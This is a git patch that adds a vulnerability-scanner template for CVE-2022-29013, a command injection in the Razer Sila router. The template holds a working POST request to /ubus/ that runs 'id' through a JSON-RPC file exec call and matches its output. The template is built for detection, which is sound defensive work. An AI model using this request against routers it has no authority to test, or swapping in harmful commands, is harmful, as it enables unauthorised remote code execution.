From eb01a865dd4a073dde71a48a82b77432447361ee Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Apr 2024 11:32:23 +0530 Subject: [PATCH] Create CVE-2022-29013.yaml --- http/cves/2022/CVE-2022-29013.yaml | 51 ++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/cves/2022/CVE-2022-29013.yaml diff --git a/http/cves/2022/CVE-2022-29013.yaml b/http/cves/2022/CVE-2022-29013.yaml new file mode 100644 index 0000000000..167b552c7b --- /dev/null +++ b/http/cves/2022/CVE-2022-29013.yaml @@ -0,0 +1,51 @@ +id: CVE-2022-29013 + +info: + name: Razer Sila Gaming Router - Remote Code Execution + author: DhiyaneshDK + severity: critical + description: | + A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request. + reference: + - https://packetstormsecurity.com/files/166684/Razer-Sila-2.0.418-Command-Injection.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-29013 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29013 + cwe-id: CWE-78 + epss-score: 0.83254 + epss-percentile: 0.98361 + cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: razer + product: sila_firmware + tags: packetstorm,cve,cve2022,razer,sila,router + +http: + - method: POST + path: + - "{{BaseURL}}/ubus/" + headers: + Origin: "{{RootURL}}" + Referer: "{{ROotURL}}" + X-Requested-With: XMLHttpRequest + body: | + {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)' + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200